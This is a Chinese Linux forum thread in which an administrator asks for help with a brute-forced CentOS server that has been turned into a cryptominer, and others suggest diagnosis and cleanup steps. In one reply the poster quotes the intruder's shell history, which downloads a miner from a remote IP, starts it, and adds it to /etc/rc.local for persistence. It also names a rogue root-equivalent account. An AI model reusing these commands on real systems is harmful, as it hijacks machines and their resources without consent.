免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 4962 | 回复: 11
打印 上一主题 下一主题

[系统管理] 服务器被攻击了,急!在线等! [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2015-11-23 12:41 |只看该作者 |倒序浏览
环境:CentOS 6.5

现状:root密码被暴力破解
1.查secure日志发下:ov 22 04:11:27 prd-vm-sta1-pay1 sshd[4500]: Connection closed by 185.106.94.57,攻击者是俄罗斯的IP。

2.通过top查看,发现异常进程
23170 root      20   0 21260  272  200 S  0.3  0.0   0:01.95 rhsegvfnis   

查找源:
/proc/23170下看到:lrwxrwxrwx 1 root root 0 Nov 23 11:42 exe -> /boot/rhsegvfnis


我删除这个目录后,发现还是会在/boot下再次创建其他文件并自动执行。

/etc/passwd文件里发现被创建了一个非法用户,使用userdel无法删除,好像跟root做了关联:
beef-xbdb:0:0::/root:/bin/bash

在/var/tmp下创建了如下文件:
-rw-r--r--.  1 root root   84 Jul  5 16:19 a.sh
drwxr-xr-x   2 root root 4096 Nov 23 11:04 hsperfdata_root
drwx------   2 root root 4096 Nov 23 10:54 ssh-HpJfC29744
drwx------   2 root root 4096 Nov 23 10:44 ssh-Inrki29607

请问各位大神,接下来我要怎么做?

现在有几台服务器因为nfs端口的问题(做了固定后,发现程序运行报错),没有启动iptables。

请各位帮忙解决,如需要相关信息,我会马上提供的。

论坛徽章:
0
2 [报告]
发表于 2015-11-23 12:44 |只看该作者
522  echo 'wget htp://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz'> /tmp/1.sh
523  echo 'tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz'>>/tmp/1.sh
524  sed -i '/LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk/d' /etc/rc.local
525  ps -ef |grep minerd |awk '{print $2}'|xargs kill -9
526  echo '/tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk' >>/etc/rc.local
527  echo 'setsid /tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk &'>>/tmp/1.sh
528  chmod +x /tmp/1.sh
529  cd /tmp
530  ./1.sh&
531  exit
532  ifconfig
533  exit
534  locate redis.conf
535  find / -name "redis.conf"
536  vim /usr/local/redis-2.6.17/redis.conf
537  reboot
538  exit
539  netstat -an | grep 6379
540  locate redis.conf
541  find / -name "redis.conf
542  find / -name "redis.conf"
543  find / -name "redis-server"
544  /usr/local/redis-2.6.17/src/redis-server
545  netstat -an | grep 6379
546  /usr/local/redis-2.6.17/src/redis-server &
547  netstat -an | grep 6379

上面应该是攻击者的操作记录

论坛徽章:
0
3 [报告]
发表于 2015-11-23 12:50 |只看该作者
我用last看了下
root     pts/0        42.62.3.141      Sun Nov 22 00:21 - 00:23  (00:02)   
root     pts/1        199.244.49.184   Sat Nov 21 14:31 - 14:35  (00:04)   --美国IP

应该是美国的IP做的。

crontab没有异常。

我已经把/etc/rc.local下的'/LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk/d' 删除了。

论坛徽章:
54
2015亚冠之德黑兰石油
日期:2015-07-07 13:00:1615-16赛季CBA联赛之深圳
日期:2016-03-31 09:03:5415-16赛季CBA联赛之辽宁
日期:2016-05-09 20:38:15程序设计版块每日发帖之星
日期:2016-05-12 06:20:0015-16赛季CBA联赛之四川
日期:2016-05-13 15:19:4715-16赛季CBA联赛之福建
日期:2016-05-15 20:24:34每日论坛发贴之星
日期:2016-05-16 06:20:0015-16赛季CBA联赛之吉林
日期:2016-05-26 11:49:4715-16赛季CBA联赛之广东
日期:2016-05-26 13:49:18极客徽章
日期:2016-12-07 14:05:2315-16赛季CBA联赛之广夏
日期:2016-12-20 17:33:532017金鸡报晓
日期:2017-01-10 15:19:56
4 [报告]
发表于 2015-11-23 12:54 |只看该作者
这似乎是用你的服务器挖矿的,

论坛徽章:
0
5 [报告]
发表于 2015-11-23 12:56 |只看该作者
回复 4# haooooaaa


   请问我现在要如何处理,现在找不到自动生成文件的源码在哪。。

请指点。

论坛徽章:
0
6 [报告]
发表于 2015-11-23 15:54 |只看该作者
请各位帮忙分析下。多谢了。

论坛徽章:
2
处女座
日期:2014-10-24 11:12:372015年辞旧岁徽章
日期:2015-03-03 16:54:15
7 [报告]
发表于 2015-11-23 16:16 |只看该作者
帮您顶一下。没有遇到过这个类问题。

论坛徽章:
2
处女座
日期:2014-10-24 11:12:372015年辞旧岁徽章
日期:2015-03-03 16:54:15
8 [报告]
发表于 2015-11-23 16:17 |只看该作者
服务器前端有没有防火墙或路由器,如果有的话,先进行ACL限制。然后再进行服务器问题的处理。

论坛徽章:
0
9 [报告]
发表于 2015-11-23 16:54 |只看该作者
我这个服务器是redis server,听说现在可以通过端口做个证书登录到我的服务器,因为做的keepalive,所以我无法彻底删除他的程序,每次删除文件源,再kill进程后,都会自动生成新的。

应该是4楼的朋友说的,挖矿呢。。。

目前的解决方法貌似只能重做系统。。

论坛徽章:
0
10 [报告]
发表于 2015-11-28 20:01 |只看该作者
看看有哪些程序在运行,有没有程序被替换掉?是否可以对比下程序的MD5值?
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP